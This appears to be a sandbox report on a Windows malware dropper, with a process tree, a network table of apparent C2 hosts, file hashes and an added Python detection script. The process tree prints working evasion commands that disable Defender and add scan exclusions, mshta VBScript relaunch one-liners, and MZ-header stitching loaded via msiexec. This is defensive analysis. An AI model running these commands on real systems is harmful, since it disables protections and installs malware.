C:\Windows\system32\cmd.exe /c Wed096e68af113.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe
Wed09a48dab921a3bda7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe
Wed094d15aaa9a48.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe
Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe
Wed0937c2dc68a2496.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe
Wed09a6fb1d0dd846.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe
Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe
Wed096e68af113.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe
Wed098e48a54663552b.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe
Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$70190,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe
Wed0911cd5800a45.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 272
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe
Wed0961d5d40c7b937c7.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0988d1c2bd9a37.exe
Wed0988d1c2bd9a37.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe" ) do taskkill /f -IM "%~nXN"
C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp
"C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$80190,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -IM "Wed0911cd5800a45.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT:cloSE( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" ", 0 , TRuE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct( "wSCRIPT.SHEll").RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W ",0 , True ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81&CopY /y /B PUVMYbl.81 +B0zcQ1x.o +490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W&Del /Q *& StaRT msiexec /y ..\_enU.W
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eChO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"
C:\Windows\SysWOW64\msiexec.exe
msiexec /y ..\_enU.W
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 464
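The process tree above contains the whole evasion chain in clear text: two PowerShell invocations that switch off Defender real-time monitoring and cloud submission and then exclude `%TEMP%` from scanning, an `mshta.exe vbscript:` one-liner that launches cmd, the `copy /y ... && start ... taskkill /f` self-copy-and-relaunch, the `set /p ="MZ"` plus `copy /b` stitching, and `msiexec /y` loading the stitched DLL. The dropper randomises letter case (`vbscRIPT:cloSE`, `CopY /y /B`, `StaRT`), so any string match on these command lines has to be case-insensitive. The detection below is an added example, not part of the sandbox report or any vendor product: it runs case-insensitive rules over (image, command line) pairs, with the command lines copied from this report and the pairing itself an assumed telemetry shape; the ATT&CK IDs are this example's own mapping.

```python
"""Flag the defence-evasion and staging tricks seen in the process tree.

Added example, not part of the sandbox report or any vendor tooling.  The
command lines in SAMPLE_EVENTS are copied from the report; the (image,
command line) pairing is an assumed telemetry shape.
"""
import ntpath
import re
from typing import List, Tuple

# (rule name, ATT&CK technique or "n/a", regex).  All rules use re.I because the
# dropper mangles letter case to defeat case-sensitive matching.
RULES: List[Tuple[str, str, "re.Pattern[str]"]] = [
    ("defender_realtime_disabled", "T1562.001",
     re.compile(r'Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$?true', re.I)),
    ("defender_exclusion_added", "T1562.001",
     re.compile(r'Add-MpPreference\b.*-ExclusionPath\b', re.I)),
    ("mshta_inline_vbscript", "T1218.005",
     re.compile(r'mshta(?:\.exe)?"?\s+vbscript:', re.I)),
    # 'echo|set /p ="MZ" > f' writes a bare MZ magic; 'copy /b' then glues the
    # non-PE fragments behind it, so no file on disk is a PE until the last step.
    ("mz_header_stitched_with_copy_b", "T1027",
     re.compile(r'set\s*/p\s*=\s*"*MZ"*.*copy\s+(?:/y\s+)?/b\b', re.I)),
    ("msiexec_register_dll", "T1218.007",
     re.compile(r'msiexec(?:\.exe)?"?\s+/y\s+', re.I)),
    # Copy self under a random name, start the copy, kill the original by name.
    ("copy_relaunch_then_taskkill", "n/a",
     re.compile(r'copy\s+/y\s+.*&&\s*start\s+.*taskkill\s+/f', re.I)),
]


def scan(events: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (image basename, rule name, technique) for every rule an event trips."""
    hits: List[Tuple[str, str, str]] = []
    for image, cmdline in events:
        for rule, technique, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((ntpath.basename(image), rule, technique))
    return hits


# Constructed events: command lines copied from the report's process tree.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable"),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"'),
    (r"C:\Windows\SysWOW64\mshta.exe",
     r'''"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct( "wSCRIPT.SHEll").RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~+ nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W ",0 , True ))'''),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'''"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe" ..\I8TaQYBpLsJ.ExE&&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe" ) do taskkill /f -IM "%~nXN"'''),
    (r"C:\Windows\SysWOW64\msiexec.exe", r"msiexec /y ..\_enU.W"),
    # Benign-looking control line from the same tree: should trip nothing.
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe"),
]


if __name__ == "__main__":
    for image, rule, technique in scan(SAMPLE_EVENTS):
        print(f"{image:16} {rule:32} {technique}")
```

The two `Set-MpPreference`/`Add-MpPreference` hits are the ones to alert on first: they appear before any payload runs and are cheap to match in PowerShell script-block or process-creation logs, and outside a sandbox a non-installer process excluding its own `%TEMP%` from Defender has no benign explanation.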
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | sayanu.xyz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:49275 | | tcp |
| N/A | 127.0.0.1:49277 | | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| FR | 91.121.67.60:2151 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| FR | 51.178.186.149:80 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 72.84.118.132:8080 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.75:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 1b16fe969e31beab26afc7060fba271b |
| SHA1 | 97f350235d63a11eb5bf555d1d63f8667d47fb31 |
| SHA256 | c8345b213f585dffbfc2ec8374dee34b9760c4ce5ddc02414cb90de95dd85e7e |
| SHA512 | 90e72cb53e6e983ea3a02aabbb7547873162bdcd47316126c1c7c57efa1104cb6f1f4a0bf5e418a345aba088f23a6d1a02454fb5e50c5222ecfc53fda1ace882 |
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe
| MD5 | 3fce5aacf6f9eb4b34126d0c2a9d36c2 |
| SHA1 | 5590c4402fcda16fe873f857088b4ee6c38858b1 |
| SHA256 | ba64bfa019840bf787c93b9f25b6fcce479be24c43a285258174a1a70b9bbf12 |
| SHA512 | ed8b38dc4af79c7271412a44ecdcb7e2df0525f314cc52b700ee2e93612c99ccad78a48b657ba5178595d133ad03ed842f4db71165a933fcba0b540f48db58d7 |
memory/2896-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2896-66-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2896-77-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2896-76-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2896-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2896-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2896-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2896-83-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe
| MD5 | 3bf8a169c55f8b54700880baee9099d7 |
| SHA1 | d411f875744aa2cfba6d239bad723cbff4cf771a |
| SHA256 | 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2 |
| SHA512 | f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11 |
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe
| MD5 | a2326dff5589a00ed3fd40bc1bd0f037 |
| SHA1 | 66c3727fb030f5e1d931de28374cf20e4693bbf4 |
| SHA256 | 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c |
| SHA512 | fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826 |
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe
| MD5 | 69c4678681165376014646030a4fe7e4 |
| SHA1 | fb110dad415ac036c828b51c38debd34045aa0f3 |
| SHA256 | 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77 |
| SHA512 | 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c |
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
memory/1832-134-0x00000000008C0000-0x00000000008C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
memory/2948-111-0x0000000000400000-0x0000000000414000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
memory/1072-143-0x00000000009B0000-0x0000000000A20000-memory.dmp
memory/2652-140-0x0000000000A00000-0x0000000000A16000-memory.dmp
memory/2816-139-0x0000000001300000-0x0000000001372000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PJTNEGBYNN4IUXD59UYU.temp
| MD5 | aeb0ebed9ca31f56d1b50221cf5c08e0 |
| SHA1 | 561ed7f32a0e2bf401ec81f6ba3e7a2c0ea0dbab |
| SHA256 | dfc707852c87f4bb93e9e9594f581517cc1f97b8ffd46191b4af279fd407cdcc |
| SHA512 | ffa93eff2207b6af479ef1d9fda297dd4f64f3aa97a726e8dcd9c746123af3611995feb4657d7edd789dd99a2cf752e7be5b6a0bb2a6aaf250e6bceb82bcbcff |
memory/2408-138-0x0000000000E30000-0x0000000000EA0000-memory.dmp
memory/1648-152-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2948-154-0x0000000000400000-0x0000000000414000-memory.dmp
memory/592-151-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
| MD5 | d165e339ef0c057e20eb61347d06d396 |
| SHA1 | cb508e60292616b22f2d7a5ab8f763e4c89cf448 |
| SHA256 | ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8 |
| SHA512 | da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580 |
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0988d1c2bd9a37.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe
| MD5 | e90750ecf7d4add59391926ccfc15f51 |
| SHA1 | 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1 |
| SHA256 | b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59 |
| SHA512 | 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9 |
C:\Users\Admin\AppData\Local\Temp\is-TR5KG.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\is-TR5KG.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe
| MD5 | 6b4f4e37bc557393a93d254fe4626bf3 |
| SHA1 | b9950d0223789ae109b43308fcaf93cd35923edb |
| SHA256 | 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d |
| SHA512 | a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e |
memory/2896-82-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2896-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2896-75-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2896-63-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zS0C687BB6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
